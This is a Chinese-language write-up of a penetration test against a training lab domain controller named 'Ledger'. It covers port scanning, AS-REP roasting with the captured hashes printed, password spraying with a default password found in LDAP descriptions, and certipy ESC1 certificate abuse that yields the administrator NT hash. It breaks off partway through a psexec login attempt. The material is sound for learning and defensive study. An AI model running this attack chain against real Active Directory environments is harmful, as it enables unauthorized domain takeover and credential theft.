Ledger靶机 渗透测试报告

最终权限：nt authority\system (Domain Admin)
探明漏洞：ESC1[严重]、AS-REP Roasting、smb信息泄露、Kerberoasting、LDAP敏感信息泄露、密码复用
风险评估：9/10
测试过程：
端口探测
sudo python3 tools/scan.py -i 10.48.180.88 -r 1000
点击查看

1. [!] 提取到开放 TCP 端口: 53,80,88,135,139,389,443,445,464,593,636,3268,3269,3389,7680,9389,47001,49664,49665,49666,49667,49669,49670,49671,49675,49676,49679,49711,49717,49722                                 
2.                                                                                                                                                                                                                
3. [+] 阶段 2: 正在进行详细服务版本识别 (-sV) 与默认安全脚本探测 (-sC)...
4. Starting Nmap 7.98 ( https://nmap.org ) at 2026-03-19 17:55 +0800
5. Stats: 0:00:26 elapsed; 0 hosts completed (1 up), 1 undergoing Service Scan
6. Service scan Timing: About 50.00% done; ETC: 17:56 (0:00:25 remaining)
7. Stats: 0:01:07 elapsed; 0 hosts completed (1 up), 1 undergoing Script Scan
8. NSE Timing: About 97.29% done; ETC: 17:56 (0:00:00 remaining)
9. Stats: 0:01:56 elapsed; 0 hosts completed (1 up), 1 undergoing Script Scan
10. NSE Timing: About 99.93% done; ETC: 17:57 (0:00:00 remaining)
11. Nmap scan report for 10.48.180.88
12. Host is up (0.16s latency).
14. PORT      STATE SERVICE       VERSION
15. 53/tcp    open  domain        Simple DNS Plus
16. 80/tcp    open  http          Microsoft IIS httpd 10.0
17. |_http-title: IIS Windows Server
18. |_http-server-header: Microsoft-IIS/10.0
19. | http-methods:
20. |_  Potentially risky methods: TRACE
21. 88/tcp    open  kerberos-sec  Microsoft Windows Kerberos (server time: 2026-03-19 09:55:43Z)
22. 135/tcp   open  msrpc         Microsoft Windows RPC
23. 139/tcp   open  netbios-ssn   Microsoft Windows netbios-ssn
24. 389/tcp   open  ldap          Microsoft Windows Active Directory LDAP (Domain: thm.local, Site: Default-First-Site-Name)
25. | ssl-cert: Subject: commonName=labyrinth.thm.local
26. | Subject Alternative Name: othername: 1.3.6.1.4.1.311.25.1:<unsupported>, DNS:labyrinth.thm.local
27. | Not valid before: 2026-03-19T09:44:14
28. |_Not valid after:  2027-03-19T09:44:14
29. |_ssl-date: 2026-03-19T09:57:54+00:00; 0s from scanner time.
30. 443/tcp   open  ssl/https?
31. | tls-alpn:
32. |   h2
33. |_  http/1.1
34. | ssl-cert: Subject: commonName=thm-LABYRINTH-CA
35. | Not valid before: 2023-05-12T07:26:00
36. |_Not valid after:  2028-05-12T07:35:59
37. |_ssl-date: 2026-03-19T09:57:54+00:00; 0s from scanner time.
38. 445/tcp   open  microsoft-ds?
39. 464/tcp   open  kpasswd5?
40. 593/tcp   open  ncacn_http    Microsoft Windows RPC over HTTP 1.0
41. 636/tcp   open  ssl/ldap      Microsoft Windows Active Directory LDAP (Domain: thm.local, Site: Default-First-Site-Name)
42. |_ssl-date: 2026-03-19T09:57:54+00:00; 0s from scanner time.
43. | ssl-cert: Subject: commonName=labyrinth.thm.local
44. | Subject Alternative Name: othername: 1.3.6.1.4.1.311.25.1:<unsupported>, DNS:labyrinth.thm.local
45. | Not valid before: 2026-03-19T09:44:14
46. |_Not valid after:  2027-03-19T09:44:14
47. 3268/tcp  open  ldap          Microsoft Windows Active Directory LDAP (Domain: thm.local, Site: Default-First-Site-Name)
48. | ssl-cert: Subject: commonName=labyrinth.thm.local
49. | Subject Alternative Name: othername: 1.3.6.1.4.1.311.25.1:<unsupported>, DNS:labyrinth.thm.local
50. | Not valid before: 2026-03-19T09:44:14
51. |_Not valid after:  2027-03-19T09:44:14
52. |_ssl-date: 2026-03-19T09:57:54+00:00; 0s from scanner time.
53. 3269/tcp  open  ssl/ldap      Microsoft Windows Active Directory LDAP (Domain: thm.local, Site: Default-First-Site-Name)
54. | ssl-cert: Subject: commonName=labyrinth.thm.local
55. | Subject Alternative Name: othername: 1.3.6.1.4.1.311.25.1:<unsupported>, DNS:labyrinth.thm.local
56. | Not valid before: 2026-03-19T09:44:14
57. |_Not valid after:  2027-03-19T09:44:14
58. |_ssl-date: 2026-03-19T09:57:54+00:00; 0s from scanner time.
59. 3389/tcp  open  ms-wbt-server Microsoft Terminal Services
60. |_ssl-date: 2026-03-19T09:57:54+00:00; 0s from scanner time.
61. | rdp-ntlm-info:
62. |   Target_Name: THM
63. |   NetBIOS_Domain_Name: THM
64. |   NetBIOS_Computer_Name: LABYRINTH
65. |   DNS_Domain_Name: thm.local
66. |   DNS_Computer_Name: labyrinth.thm.local
67. |   Product_Version: 10.0.17763
68. |_  System_Time: 2026-03-19T09:56:41+00:00
69. | ssl-cert: Subject: commonName=labyrinth.thm.local
70. | Not valid before: 2026-03-18T09:53:13
71. |_Not valid after:  2026-09-17T09:53:13
72. 7680/tcp  open  pando-pub?
73. 9389/tcp  open  mc-nmf        .NET Message Framing
74. 47001/tcp open  http          Microsoft HTTPAPI httpd 2.0 (SSDP/UPnP)
75. |_http-title: Not Found
76. |_http-server-header: Microsoft-HTTPAPI/2.0
77. 49664/tcp open  msrpc         Microsoft Windows RPC
78. 49665/tcp open  msrpc         Microsoft Windows RPC
79. 49666/tcp open  msrpc         Microsoft Windows RPC
80. 49667/tcp open  msrpc         Microsoft Windows RPC
81. 49669/tcp open  msrpc         Microsoft Windows RPC
82. 49670/tcp open  ncacn_http    Microsoft Windows RPC over HTTP 1.0
83. 49671/tcp open  msrpc         Microsoft Windows RPC
84. 49675/tcp open  msrpc         Microsoft Windows RPC
85. 49676/tcp open  msrpc         Microsoft Windows RPC
86. 49679/tcp open  msrpc         Microsoft Windows RPC
87. 49711/tcp open  msrpc         Microsoft Windows RPC
88. 49717/tcp open  msrpc         Microsoft Windows RPC
89. 49722/tcp open  msrpc         Microsoft Windows RPC
90. Service Info: Host: LABYRINTH; OS: Windows; CPE: cpe:/o:microsoft:windows
92. Host script results:
93. | smb2-security-mode:
94. |   3.1.1:
95. |_    Message signing enabled and required
96. | smb2-time:
97. |   date: 2026-03-19T09:56:42
98. |_  start_date: N/A
100. Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .
101. Nmap done: 1 IP address (1 host up) scanned in 145.29 seconds
103. [!] 阶段 2 完成，基础指纹信息已安全落地。                                                                                                                                                                     
104.                                                                                                                                                                                                                
105. [+] 阶段 3: 探测 UDP Top 20 端口...
106. Starting Nmap 7.98 ( https://nmap.org ) at 2026-03-19 17:58 +0800
107. Warning: 10.48.180.88 giving up on port because retransmission cap hit (3).
108. Nmap scan report for 10.48.180.88
109. Host is up (0.18s latency).
111. PORT      STATE         SERVICE      VERSION
112. 53/udp    open          domain       (generic dns response: SERVFAIL)
113. 67/udp    open|filtered tcpwrapped
114. 68/udp    open|filtered tcpwrapped
115. 69/udp    closed        tftp
116. 123/udp   open          ntp          NTP v3
117. 135/udp   open|filtered msrpc
118. 137/udp   open|filtered netbios-ns
119. 138/udp   open|filtered tcpwrapped
120. 139/udp   open|filtered tcpwrapped
121. 161/udp   open|filtered snmp
122. 162/udp   closed        snmptrap
123. 445/udp   closed        microsoft-ds
124. 500/udp   open|filtered isakmp
125. 514/udp   closed        syslog
126. 520/udp   closed        route
127. 631/udp   closed        ipp
128. 1434/udp  open|filtered ms-sql-m
129. 1900/udp  open|filtered upnp
130. 4500/udp  open|filtered tcpwrapped
131. 49152/udp open|filtered unknown
133. Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .
134. Nmap done: 1 IP address (1 host up) scanned in 36.90 seconds

复制代码

sudo echo '10.48.180.88 labyrinth.thm.local thm.local labyrinth' >> /etc/hosts
HTTP 测试
sudo feroxbuster -u http://10.48.180.88/
sudo feroxbuster -u http://10.48.180.88:47001/
目录无有趣信息，网页源码无有趣信息
smb guest访问
nxc smb 10.48.180.88 -u 'guest' -p '' --shares

1. SMB         10.48.180.88    445    LABYRINTH        [*] Windows 10 / Server 2019 Build 17763 x64 (name:LABYRINTH) (domain:thm.local) (signing:True) (SMBv1:None) (Null Auth:True)
2. SMB         10.48.180.88    445    LABYRINTH        [+] thm.local\guest:
3. SMB         10.48.180.88    445    LABYRINTH        [*] Enumerated shares
4. SMB         10.48.180.88    445    LABYRINTH        Share           Permissions     Remark
5. SMB         10.48.180.88    445    LABYRINTH        -----           -----------     ------
6. SMB         10.48.180.88    445    LABYRINTH        ADMIN$                          Remote Admin
7. SMB         10.48.180.88    445    LABYRINTH        C$                              Default share
8. SMB         10.48.180.88    445    LABYRINTH        IPC$            READ            Remote IPC
9. SMB         10.48.180.88    445    LABYRINTH        NETLOGON                        Logon server share
10. SMB         10.48.180.88    445    LABYRINTH        SYSVOL                          Logon server share

复制代码

发现唯一可读目录无有效信息
用户名rid枚举
nxc smb 10.48.180.88 -u 'guest' -p '' --rid-brute 10000 | grep "(SidTypeUser)" | grep -oP '\\K[^ ]+' > smbusers.txt
AS-REP Roasting
impacket-GetNPUsers thm.local/ -usersfile smbusers.txt -no-pass -format hashcat -outputfile smbusersroasting.txt
获得了四份凭证

1. $krb5asrep$23$SHELLEY_BEARD@THM.LOCAL:2f5920631b6b654ad112a6eb1c831ced$5fe7d9db2c0ea2f2693fab1b8595bdc1a21dac96cdaf97d3f4a5f1341da96c49bf98c7fc728a01e7796b713031bbca43c1a320414bf99df8b0a8a6299d6d7df9a4d41f46400eb7e22ef042b17825b78f3a9efc68fc1248d6e16095f62b3b9d80cade5aff825c0443e8e8d4f9caa43e6a384eaebf4c2906ec4dfd8879392382525efa98ae185e08a3541958299eb6681a0a8befd4be3a9ada3fd42f3ec1dbe806a8500905d93ae102a7da32b5bac4d5f77608d815a6ef78332494819afd1ed7c7941bbdaed81315e246937324f6c1c1aa7074a6da2c64b617408d0ed195def680f321455b966f
2. $krb5asrep$23$ISIAH_WALKER@THM.LOCAL:92dc4fdc9247049707610350a6afa6f6$9df6a05f6674718520a30877bb72bb9fa3a0543eee177b3b83595dfa06338705f0d45c9a157fddb6993eecd6b5cb65dc39b8f24e31cebecd0da7cf52f1f4bf3149e9640c7b6e9a0fd53602321688de7c684425653508dc0044a0c3f7cce161cbccd30a711c7842efba9eaf5dd24ec5e76a9d1a9f2af193736e14673eacd88cd11adcef1abf94c57ba31c2355f2051d91dbc7b16d7dabc7c5eedcb3099660776b75e16587df08c689b6423e714c9a91f1602f635782e20eaa782a2191af5707ec48b09e56be6ba346b2ccd02b65fbd332bde27602cf5006e55b878c585048b3620a61adb8c4ef
3. $krb5asrep$23$QUEEN_GARNER@THM.LOCAL:66c532fa36c653beaa1a58cff5e79003$8018ba50d2fed42e1371f00a16a110be0edbc8f22bbbccc0a4a292b3b1882a796608a9695075ee7b640ee0a9fbc15f3653649219f3bfd86268db2b94fca1c1840dd753fc7b35eab927ab7f052e7844a65c7e792db33e084b33a5e0710ca9026db06f7c856b75ba8fdf18218b82ccf69ae89f17618085dfe5a7c8dffb77ef91edd9fe8db41ab771a13ab553b192b87278d7f6acb8958a28751d9d96579909d25ee61e1b404e49d0ae6a0cdf8220e930738dce7735eca65eb7fd1480e5e130bd2ba42d359d3bebd81a19f7a99da0de7862a9f9bf949fbd36d9da82ebb8989c0e86019532c4b162
4. $krb5asrep$23$PHYLLIS_MCCOY@THM.LOCAL:eb62c6a8728089e664f97f9ff41e869e$044dcfbc22daa0068907c43d599cb334fa660147129d000d9b66846ca4861ffeab572ba52614be148277bba96d260a0c2467aa54d4e9b29a4289a5d8acbae9d88e6d574b0658428c065ba92e30800414ab161a77c67e735ee44f5cbede8ec7ab748f3ca7c5e63d123718f4f4e0a82eae78b196c3e8d81958060fcd3e99ef82f13a19a7f1c73c23016c7304a03e60d3b7168a98e76030e48c8767a51eb6e929f540d8a22c44388962f45efba0209b30cd5ec3cc8adf7b5a3d4da9b19d7381291e3392d7da3fbda6a15839b055c6cd9a692d5ea9a87f9ab91b1dfae4edf6e4baf2ee8017b9a46f
5. $krb5asrep$23$MAXINE_FREEMAN@THM.LOCAL:ece4ec68c9f405460bbe20ef9c630d56$3ec1a867eafffeb4c05dd65ceaed538e4cfb41fa2cdbd85a4f8d1d6c321f39f4426b0dbb04afa4ff393004a7c5b93a8057d7ed43d353c8850eb95510864822c0014a65953f8cc51780c0a4c3b7d4d792a8fa8a948f760bc91d1aa455c73b0e654675c4b1e9a76c3b819035baf61d79484585431242222a580b6100e30c8d4d947e13505fed43c7096ff8528daa5039d0157bb0355f40eaa47a295d55979034075d9fb79719f1a76b0a50b1adc795f1dd1147e1649efa944f4927938ba839ce0e3e4be9a800ccbdd2fb87b13a182d2a24fdcdf2606389b3ea90003fd098b0d5443584e379563d

复制代码

尝试爆破
hashcat -m 18200 smbusersroasting.txt /usr/share/wordlists/rockyou.txt
无果
对LDAP下手
ldapsearch -x -H ldap://10.48.180.88 -b "dc=thm,dc=local" "(objectClass=person)" > ldap_users.txt
泄露出证书内容，严重怀疑存在 AD CS

grep "sAMAccountName: " ldap_users.txt | awk '{print $2}' | sort -u > users.txt
grep "description: " ldap_users.txt | cut -d ' ' -f 2- > descriptions.txt
在查看描述信息的时候发现了个有趣的东西

直接密码喷洒
nxc smb 10.48.180.88 -u users.txt -p 'CHANGEME2023!' -d thm.local --continue-on-success
得到了两个凭证
IVY_WILLIS:CHANGEME2023!
SUSANNA_MCKNIGHT:CHANGEME2023!
Kerberoasting

1. ┌──(kali㉿kali)-[~]
2. └─$ impacket-GetUserSPNs thm.local/IVY_WILLIS:'CHANGEME2023!' -dc-ip 10.48.180.88 -request -outputfile kerb_hashes.txt
3. Impacket v0.14.0.dev0 - Copyright Fortra, LLC and its affiliated companies
5. No entries found!
6.                                                                                                       
7. ┌──(kali㉿kali)-[~]
8. └─$ impacket-GetUserSPNs thm.local/SUSANNA_MCKNIGHT:'CHANGEME2023!' -dc-ip 10.48.180.88 -request -outputfile kerb_hashes.txt
9. Impacket v0.14.0.dev0 - Copyright Fortra, LLC and its affiliated companies
11. No entries found!

复制代码

bloodhound
bloodhound-python -u 'SUSANNA_MCKNIGHT' -p 'CHANGEME2023!' -d thm.local -ns 10.48.180.88 -c All --zip
得到环境的拓扑图

1. └─$ nxc smb 10.48.180.88 -u IVY_WILLIS -p 'CHANGEME2023!' -M gpp_password      
2. SMB         10.48.180.88    445    LABYRINTH        [*] Windows 10 / Server 2019 Build 17763 x64 (name:LABYRINTH) (domain:thm.local) (signing:True) (SMBv1:None) (Null Auth:True)
3. SMB         10.48.180.88    445    LABYRINTH        [+] thm.local\IVY_WILLIS:CHANGEME2023!
4. SMB         10.48.180.88    445    LABYRINTH        [*] Enumerated shares
5. SMB         10.48.180.88    445    LABYRINTH        Share           Permissions     Remark
6. SMB         10.48.180.88    445    LABYRINTH        -----           -----------     ------
7. SMB         10.48.180.88    445    LABYRINTH        ADMIN$                          Remote Admin
8. SMB         10.48.180.88    445    LABYRINTH        C$                              Default share
9. SMB         10.48.180.88    445    LABYRINTH        IPC$            READ            Remote IPC
10. SMB         10.48.180.88    445    LABYRINTH        NETLOGON        READ            Logon server share
11. SMB         10.48.180.88    445    LABYRINTH        SYSVOL          READ            Logon server share
12. GPP_PASS... 10.48.180.88    445    LABYRINTH        [+] Found SYSVOL share
13. GPP_PASS... 10.48.180.88    445    LABYRINTH        [*] Searching for potential XML files containing passwords
14.                                                                                                       
15. ┌──(kali㉿kali)-[~]
16. └─$ nxc smb 10.48.180.88 -u IVY_WILLIS -p 'CHANGEME2023!' --users        
17. SMB         10.48.180.88    445    LABYRINTH        [*] Windows 10 / Server 2019 Build 17763 x64 (name:LABYRINTH) (domain:thm.local) (signing:True) (SMBv1:None) (Null Auth:True)
18. SMB         10.48.180.88    445    LABYRINTH        [+] thm.local\IVY_WILLIS:CHANGEME2023!
20. 另一个用户同理

复制代码

用两个凭证都去翻smb目录，有效信息基本没有
发现SUSANNA_MCKNIGHT有可以rdp登陆

1. ┌──(kali㉿kali)-[~]
2. └─$ nxc rdp 10.48.180.88 -u SUSANNA_MCKNIGHT -p 'CHANGEME2023!'
3. RDP         10.48.180.88    3389   LABYRINTH        [*] Windows 10 or Windows Server 2016 Build 17763 (name:LABYRINTH) (domain:thm.local) (nla:True)
4. RDP         10.48.180.88    3389   LABYRINTH        [+] thm.local\SUSANNA_MCKNIGHT:CHANGEME2023! (Pwn3d!)

复制代码

之前泄露出了证书信息，测试AD CS
certipy-ad find -u SUSANNA_MCKNIGHT -p 'CHANGEME2023!' -dc-ip 10.48.180.88 -target thm.local -vulnerable -enabled

发现ESC1漏洞！
以SUSANNA_MCKNIGHT的身份向CS申请域管理员身份证和administrator.ccache（TGT）

1. ┌──(kali㉿kali)-[~]
2. └─$ certipy-ad req -u SUSANNA_MCKNIGHT@thm.local -p 'CHANGEME2023!' -target 10.48.180.88 -dc-ip 10.48.180.88 -ca thm-LABYRINTH-CA -template ServerAuth -upn administrator@thm.local
3. Certipy v5.0.4 - by Oliver Lyak (ly4k)
5. [*] Requesting certificate via RPC
6. [*] Request ID is 25
7. [*] Successfully requested certificate
8. [*] Got certificate with UPN 'administrator@thm.local'
9. [*] Certificate has no object SID
10. [*] Try using -sid to set the object SID or see the wiki for more details
11. [*] Saving certificate and private key to 'administrator.pfx'
12. [*] Wrote certificate and private key to 'administrator.pfx'

复制代码

获取NThash

1. ┌──(kali㉿kali)-[~]
2. └─$ certipy-ad auth -pfx administrator.pfx -dc-ip 10.48.180.88 -username administrator -domain thm.local
3. Certipy v5.0.4 - by Oliver Lyak (ly4k)
5. [*] Certificate identities:
6. [*]     SAN UPN: 'administrator@thm.local'
7. [*] Using principal: 'administrator@thm.local'
8. [*] Trying to get TGT...
9. [*] Got TGT
10. [*] Saving credential cache to 'administrator.ccache'
11. [*] Wrote credential cache to 'administrator.ccache'
12. [*] Trying to retrieve NT hash for 'administrator'
13. [*] Got hash for 'administrator@thm.local': aad3b435b51404eeaad3b435b51404ee:07d677a6cf40925beb80ad6428752322

复制代码

因为目标没有开启winrm服务，所以选择impacket-psexec
hash登陆失败，可能被策略组给挡住了

1. ┌──(kali㉿kali)-[~]
2. └─$ impacket-psexec -hashes aad3b435b51404eeaad3b435b51404ee:07d677a6cf40925beb80ad6428752322 administrator@10.48.180.88
3. Impacket v0.14.0.dev0 - Copyright Fortra, LLC and its affiliated companies
5. [-] SMB SessionError: code: 0xc000006e - STATUS_ACCOUNT_RESTRICTION - Indicates a referenced user name and authentication information are valid, but some user account restriction has prevented successful authentication (such as time-of-day restrictions).

复制代码

直接使用刚才certipy给的TGT来尝试

:wq

来源：程序园用户自行投稿发布，如果侵权，请联系站长删除
免责声明：如果侵犯了您的权益，请联系站长，我们会及时删除侵权内容，谢谢合作！